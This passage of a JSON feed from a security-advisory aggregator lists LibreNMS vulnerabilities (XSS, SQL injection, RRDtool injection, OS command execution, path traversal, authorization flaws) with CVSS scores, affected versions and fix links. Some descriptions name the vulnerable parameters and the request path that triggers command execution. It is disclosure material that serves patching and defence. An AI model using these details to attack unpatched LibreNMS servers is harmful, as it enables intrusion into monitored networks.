vulnerabilities via the service_ip, hostname, and service_param parameters.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-06-03T00:01:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://nvd.nist.gov/vuln/detail/CVE-2022-29712","https://github.com/librenms/librenms/pull/13932","https://github.com/librenms/librenms/commit/8b82341cb742e7bd4966964b399012f7ba017e0b","https://github.com/advisories/GHSA-23f2-vgr6-fwv7"],"source_kind":"github","identifiers":["GHSA-23f2-vgr6-fwv7","CVE-2022-29712"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:21.042Z","updated_at":"2026-09-03T00:13:25.529Z","epss_percentage":0.01688,"epss_percentile":0.75078,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yM2YyLXZncjYtZnd2N84AArWl","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yM2YyLXZncjYtZnd2N84AArWl","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.4.0","vulnerable_version_range":"\u003c 22.4.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yM2YyLXZncjYtZnd2N84AArWl/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yZ3FnLTJyZzctZ2gzM84AArWh","url":"https://github.com/advisories/GHSA-2gqg-2rg7-gh33","title":"Cross site scripting in librenms","description":"LibreNMS v22.3.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /Table/GraylogController.php.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-06-03T00:01:06.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-29711","https://github.com/librenms/librenms/pull/13931","https://github.com/librenms/librenms/commit/cc6112b8fb36039b862b42d86eb79ef7ee89d31b","https://github.com/advisories/GHSA-2gqg-2rg7-gh33"],"source_kind":"github","identifiers":["GHSA-2gqg-2rg7-gh33","CVE-2022-29711"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:20.118Z","updated_at":"2026-09-03T00:13:24.173Z","epss_percentage":0.00699,"epss_percentile":0.506,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yZ3FnLTJyZzctZ2gzM84AArWh","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yZ3FnLTJyZzctZ2gzM84AArWh","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.4.0","vulnerable_version_range":"\u003c 22.4.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yZ3FnLTJyZzctZ2gzM84AArWh/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nNXI2LXZybXgtOWd3as4AAlbR","url":"https://github.com/advisories/GHSA-g5r6-vrmx-9gwj","title":"LibreNMS SQL Injection vulnerability","description":"In LibreNMS before 1.65.1, an authenticated attacker can achieve SQL Injection via the customoid.inc.php device_id POST parameter to ajax_form.php.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-05-24T17:24:01.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-15873","https://github.com/librenms/librenms/pull/11923","https://github.com/librenms/librenms/commit/8f3a29cde5bbd8608f9b42923a7d7e2598bcac4e","https://community.librenms.org/c/announcements","https://github.com/librenms/librenms/compare/1.65...1.65.1","https://research.loginsoft.com/bugs/blind-sql-injection-in-librenms","https://github.com/advisories/GHSA-g5r6-vrmx-9gwj"],"source_kind":"github","identifiers":["GHSA-g5r6-vrmx-9gwj","CVE-2020-15873"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-04-24T21:05:04.502Z","updated_at":"2026-09-03T00:08:26.137Z","epss_percentage":0.0222,"epss_percentile":0.80504,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nNXI2LXZybXgtOWd3as4AAlbR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nNXI2LXZybXgtOWd3as4AAlbR","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"1.65.1","vulnerable_version_range":"\u003c 1.65.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nNXI2LXZybXgtOWd3as4AAlbR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xNXJnLXdnN2gtNzNtNc4AAh_b","url":"https://github.com/advisories/GHSA-q5rg-wg7h-73m5","title":"LibreNMS Information Disclosure","description":"An issue was discovered in LibreNMS through 1.47. The scripts that handle graphing options (`html/includes/graphs/common.inc.php` and `html/includes/graphs/graphs.inc.php`) do not sufficiently validate or encode several fields of user supplied input. Some parameters are filtered with `mysqli_real_escape_string`, which is only useful for preventing SQL injection attacks; other parameters are unfiltered. This allows an attacker to inject RRDtool syntax with newline characters via the `html/graph.php` script. RRDtool syntax is quite versatile and an attacker could leverage this to perform a number of attacks, including disclosing directory structure and filenames, file content, denial of service, or writing arbitrary files.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2022-05-24T16:55:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2019-10665","https://www.darkmatter.ae/xen1thlabs/librenms-rrdtool-injection-vulnerability-xl-19-023","https://github.com/advisories/GHSA-q5rg-wg7h-73m5"],"source_kind":"github","identifiers":["GHSA-q5rg-wg7h-73m5","CVE-2019-10665"],"repository_url":"https://github.com/spaceraccoon/CVE-2020-10665","blast_radius":0.0,"created_at":"2023-07-18T00:04:39.285Z","updated_at":"2026-09-03T00:11:35.182Z","epss_percentage":0.01482,"epss_percentile":0.715,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xNXJnLXdnN2gtNzNtNc4AAh_b","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xNXJnLXdnN2gtNzNtNc4AAh_b","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.47"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xNXJnLXdnN2gtNzNtNc4AAh_b/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02MnE3LXFqNmctZ3ZyN84AAgi7","url":"https://github.com/advisories/GHSA-62q7-qj6g-gvr7","title":"LibreNMS arbitrary OS commands execution","description":"LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the `$_POST['community']` parameter to `html/pages/addhost.inc.php` during creation of a new device, and then making a `/ajax_output.php?id=capture\u0026format=text\u0026type=snmpwalk\u0026hostname=localhost request that triggers html/includes/output/capture.inc.php` command mishandling.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2022-05-24T16:44:30.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2018-20434","https://drive.google.com/file/d/1LcGmOY8x-TG-wnNr-cM_f854kxk0etva/view?usp=sharing","https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d","https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434","https://github.com/advisories/GHSA-62q7-qj6g-gvr7"],"source_kind":"github","identifiers":["GHSA-62q7-qj6g-gvr7","CVE-2018-20434"],"repository_url":null,"blast_radius":0.0,"created_at":"2024-04-24T23:05:01.792Z","updated_at":"2026-09-03T00:08:24.707Z","epss_percentage":0.71487,"epss_percentile":0.99369,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02MnE3LXFqNmctZ3ZyN84AAgi7","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02MnE3LXFqNmctZ3ZyN84AAgi7","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":null,"vulnerable_version_range":"= 1.46"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02MnE3LXFqNmctZ3ZyN84AAgi7/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05bTgyLWYzd3gtcDYyNc4AAUsc","url":"https://github.com/advisories/GHSA-9m82-f3wx-p625","title":"LibreNMS XSS Vulnerability","description":"Persistent Cross-Site Scripting (XSS) issues in LibreNMS before 1.44 allow remote attackers to inject arbitrary web script or HTML via the dashboard_name parameter in the /ajax_form.php resource, related to html/includes/forms/add-dashboard.inc.php, html/includes/forms/delete-dashboard.inc.php, and html/includes/forms/edit-dashboard.inc.php.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-05-14T01:53:39.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2018-18478","https://github.com/librenms/librenms/issues/9170","https://github.com/librenms/librenms/pull/9171","https://github.com/librenms/librenms/releases/tag/1.44","https://hackpuntes.com/cve-2018-18478-libre-nms-1-43-cross-site-scripting-persistente/","https://github.com/advisories/GHSA-9m82-f3wx-p625"],"source_kind":"github","identifiers":["GHSA-9m82-f3wx-p625","CVE-2018-18478"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-07-25T18:03:42.347Z","updated_at":"2026-09-03T00:11:33.836Z","epss_percentage":0.01597,"epss_percentile":0.74007,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05bTgyLWYzd3gtcDYyNc4AAUsc","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05bTgyLWYzd3gtcDYyNc4AAUsc","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"1.44","vulnerable_version_range":"\u003c 1.44"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05bTgyLWYzd3gtcDYyNc4AAUsc/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00ZndoLXI4NjYtcHZoOc4AATvU","url":"https://github.com/advisories/GHSA-4fwh-r866-pvh9","title":"LibreNMS SQL Injection","description":"LibreNMS through 1.47 allows SQL injection via the html/ajax_table.php sort[hostname] parameter, exploitable by authenticated users during a search.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-05-14T01:14:50.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2018-20678","https://cert.enea.pl/advisories/cert-190101.html","https://github.com/librenms/librenms/pull/11920","https://github.com/librenms/librenms/commit/32f72bc1ab7e980e4070e826a89d0d36a5ba62dd","https://github.com/advisories/GHSA-4fwh-r866-pvh9"],"source_kind":"github","identifiers":["GHSA-4fwh-r866-pvh9","CVE-2018-20678"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-07-24T22:03:46.035Z","updated_at":"2026-09-03T00:11:33.842Z","epss_percentage":0.01378,"epss_percentile":0.70151,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00ZndoLXI4NjYtcHZoOc4AATvU","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00ZndoLXI4NjYtcHZoOc4AATvU","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"1.65","vulnerable_version_range":"\u003c= 1.47"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00ZndoLXI4NjYtcHZoOc4AATvU/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00Y2N4LXdqcXAtNWZ3d84AASJA","url":"https://github.com/advisories/GHSA-4ccx-wjqp-5fww","title":"LibreNMS Arbitrary File Read","description":"The installation process in LibreNMS before 2017-08-18 allows remote attackers to read arbitrary files, related to html/install.php.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-05-13T01:44:10.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.9,"cvss_vector":"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2017-16759","https://github.com/librenms/librenms/pull/7184","https://github.com/librenms/librenms/commit/7887b2e1c7158204ac69ca43beafce66e4d3a3b4","https://github.com/librenms/librenms/commit/d3094fa6578b29dc34fb5a7d0bd6deab49ecc911","https://blog.librenms.org/2017/08/22/librenms-security-fix-during-the-installation-process","https://github.com/advisories/GHSA-4ccx-wjqp-5fww"],"source_kind":"github","identifiers":["GHSA-4ccx-wjqp-5fww","CVE-2017-16759"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-07-26T18:03:40.313Z","updated_at":"2026-09-03T00:04:45.098Z","epss_percentage":0.02246,"epss_percentile":0.81639,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Y2N4LXdqcXAtNWZ3d84AASJA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00Y2N4LXdqcXAtNWZ3d84AASJA","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"1.31","vulnerable_version_range":"\u003c 1.31"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00Y2N4LXdqcXAtNWZ3d84AASJA/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12aG02LWd3ODItNmY4as0vOA","url":"https://github.com/advisories/GHSA-vhm6-gw82-6f8j","title":"Cross site scripting in LibreNMS","description":"LibreNMS prior to version 22.2.2 is vulnerable to cross-site scripting.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-02-28T00:00:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-0772","https://github.com/librenms/librenms/commit/703745d0ed3948623153117d761ce48514e2f281","https://huntr.dev/bounties/faae29bd-c43a-468d-8af6-2b6aa4d40f09","https://github.com/advisories/GHSA-vhm6-gw82-6f8j"],"source_kind":"github","identifiers":["GHSA-vhm6-gw82-6f8j","CVE-2022-0772"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:34.585Z","updated_at":"2026-09-03T00:13:41.211Z","epss_percentage":0.00622,"epss_percentile":0.46511,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12aG02LWd3ODItNmY4as0vOA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12aG02LWd3ODItNmY4as0vOA","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.2.2","vulnerable_version_range":"\u003c 22.2.2"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12aG02LWd3ODItNmY4as0vOA/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zM3dmLTRjcm0tMjMyMs0sag","url":"https://github.com/advisories/GHSA-33wf-4crm-2322","title":"Improper Access Control in librenms","description":"Improper Access Control in Packagist librenms/librenms prior to 22.2.0.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-02-16T00:01:58.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-0580","https://github.com/librenms/librenms/commit/95970af78e4c899744a715766d744deef8c505f7","https://huntr.dev/bounties/2494106c-7703-4558-bb1f-1eae59d264e3","https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","https://github.com/advisories/GHSA-33wf-4crm-2322"],"source_kind":"github","identifiers":["GHSA-33wf-4crm-2322","CVE-2022-0580"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:35.555Z","updated_at":"2026-09-03T00:13:42.516Z","epss_percentage":0.0119,"epss_percentile":0.65734,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zM3dmLTRjcm0tMjMyMs0sag","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zM3dmLTRjcm0tMjMyMs0sag","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.2.0","vulnerable_version_range":"\u003c 22.2.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zM3dmLTRjcm0tMjMyMs0sag/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wcGZtLXJqNnAtMzhxNs0sYw","url":"https://github.com/advisories/GHSA-ppfm-rj6p-38q6","title":"Improper Authorization in librenms","description":"Improper Authorization in Packagist librenms/librenms prior to 22.2.0.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-02-16T00:01:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-0587","https://github.com/librenms/librenms/commit/95970af78e4c899744a715766d744deef8c505f7","https://huntr.dev/bounties/0c7c9ecd-33ac-4865-b05b-447ced735469","https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","https://github.com/advisories/GHSA-ppfm-rj6p-38q6"],"source_kind":"github","identifiers":["GHSA-ppfm-rj6p-38q6","CVE-2022-0587"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:35.547Z","updated_at":"2026-09-03T00:13:42.515Z","epss_percentage":0.0102,"epss_percentile":0.60949,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcGZtLXJqNnAtMzhxNs0sYw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wcGZtLXJqNnAtMzhxNs0sYw","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.2.0","vulnerable_version_range":"\u003c 22.2.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcGZtLXJqNnAtMzhxNs0sYw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yNTRxLXJxbXctdng0Nc0sYQ","url":"https://github.com/advisories/GHSA-254q-rqmw-vx45","title":"Missing Authorization in librenms/librenms","description":"Missing Authorization in Packagist librenms/librenms prior to 22.2.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-02-16T00:01:52.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-0588","https://github.com/librenms/librenms/commit/95970af78e4c899744a715766d744deef8c505f7","https://huntr.dev/bounties/caab3310-0d70-4c8a-8768-956f8dd3326d","https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","https://github.com/advisories/GHSA-254q-rqmw-vx45"],"source_kind":"github","identifiers":["GHSA-254q-rqmw-vx45","CVE-2022-0588"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:35.529Z","updated_at":"2026-09-03T00:13:42.514Z","epss_percentage":0.01071,"epss_percentile":0.62516,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNTRxLXJxbXctdng0Nc0sYQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yNTRxLXJxbXctdng0Nc0sYQ","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.2.0","vulnerable_version_range":"\u003c 22.2.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNTRxLXJxbXctdng0Nc0sYQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1najI2LWc1cWYtanJoN80sYA","url":"https://github.com/advisories/GHSA-gj26-g5qf-jrh7","title":"Cross-site Scripting in librenms","description":"Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-02-16T00:01:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-0589","https://github.com/librenms/librenms/commit/4c9d4eefd8064a0285f9718ef38f5617d7f9d6fa","https://huntr.dev/bounties/d943d95c-076f-441a-ab21-cbf6b15f6768","https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","https://github.com/advisories/GHSA-gj26-g5qf-jrh7"],"source_kind":"github","identifiers":["GHSA-gj26-g5qf-jrh7","CVE-2022-0589"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:35.538Z","updated_at":"2026-09-03T00:13:42.515Z","epss_percentage":0.00847,"epss_percentile":0.5552,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1najI2LWc1cWYtanJoN80sYA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1najI2LWc1cWYtanJoN80sYA","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.1.0","vulnerable_version_range":"\u003c 22.1.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1najI2LWc1cWYtanJoN80sYA/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oeG1yLTVndjktNnA4ds0ryw","url":"https://github.com/advisories/GHSA-hxmr-5gv9-6p8v","title":"Cross-site Scripting in librenms","description":"Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.2.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-02-15T00:02:47.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-0575","https://github.com/librenms/librenms/commit/4f86915866703e2fcd1e34b3fc1181ec2ad78e54","https://huntr.dev/bounties/13951f51-deed-4a3d-8275-52306cc5a87d","https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","https://github.com/advisories/GHSA-hxmr-5gv9-6p8v"],"source_kind":"github","identifiers":["GHSA-hxmr-5gv9-6p8v","CVE-2022-0575"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:35.597Z","updated_at":"2026-09-03T00:13:42.524Z","epss_percentage":0.00847,"epss_percentile":0.5552,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oeG1yLTVndjktNnA4ds0ryw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oeG1yLTVndjktNnA4ds0ryw","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.2.0","vulnerable_version_range":"\u003c 22.2.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oeG1yLTVndjktNnA4ds0ryw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ycDM0LTg1eDMtMzc2NM0r8A","url":"https://github.com/advisories/GHSA-rp34-85x3-3764","title":"Cross-site Scripting in librenms","description":"Cross-site Scripting (XSS) - Generic in Packagist librenms/librenms prior to 22.1.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-02-15T00:02:47.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-0576","https://github.com/librenms/librenms/commit/135717a9a05c5bf8921f1389cbb469dcbf300bfd","https://huntr.dev/bounties/114ba055-a2f0-4db9-aafb-95df944ba177","https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","https://github.com/advisories/GHSA-rp34-85x3-3764"],"source_kind":"github","identifiers":["GHSA-rp34-85x3-3764","CVE-2022-0576"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:35.588Z","updated_at":"2026-09-03T00:13:42.523Z","epss_percentage":0.00998,"epss_percentile":0.59549,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ycDM0LTg1eDMtMzc2NM0r8A","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ycDM0LTg1eDMtMzc2NM0r8A","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.1.0","vulnerable_version_range":"\u003c 22.1.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ycDM0LTg1eDMtMzc2NM0r8A/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03Mjg5LWNod2otN2g4Ns0ZMg","url":"https://github.com/advisories/GHSA-7289-chwj-7h86","title":"Path traversal in librenms/librenms","description":"Librenms 21.11.0 is affected by a path manipulation vulnerability in includes/html/pages/device/showconfig.inc.php.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2021-12-10T20:18:30.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-44278","https://github.com/librenms/librenms/pull/13554","https://github.com/advisories/GHSA-7289-chwj-7h86"],"source_kind":"github","identifiers":["GHSA-7289-chwj-7h86","CVE-2021-44278"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:41.081Z","updated_at":"2026-09-03T00:13:55.049Z","epss_percentage":0.01435,"epss_percentile":0.70518,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Mjg5LWNod2otN2g4Ns0ZMg","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03Mjg5LWNod2otN2g4Ns0ZMg","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 21.11.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Mjg5LWNod2otN2g4Ns0ZMg/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01dnI2LWhtNjgtNWo5cM0YwQ","url":"https://github.com/advisories/GHSA-5vr6-hm68-5j9p","title":"Cross-site Scripting in LibreNMS","description":"LibreNMS 21.11.0 is affected by is affected by a Cross Site Scripting (XSS) vulnerability in includes/html/forms/poller-groups.inc.php.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2021-12-03T20:49:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2021-44279","https://github.com/librenms/librenms/pull/13554","https://github.com/librenms/librenms/pull/13554/commits/4f231a0f49b6c953d506913364ffd7fb3a660630","https://github.com/advisories/GHSA-5vr6-hm68-5j9p"],"source_kind":"github","identifiers":["GHSA-5vr6-hm68-5j9p","CVE-2021-44279"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:12:41.499Z","updated_at":"2026-09-03T00:13:55.066Z","epss_percentage":0.00628,"epss_percentile":0.47629,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01dnI2LWhtNjgtNWo5cM0YwQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01dnI2LWhtNjgtNWo5cM0YwQ","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":null,"vulnerable_version_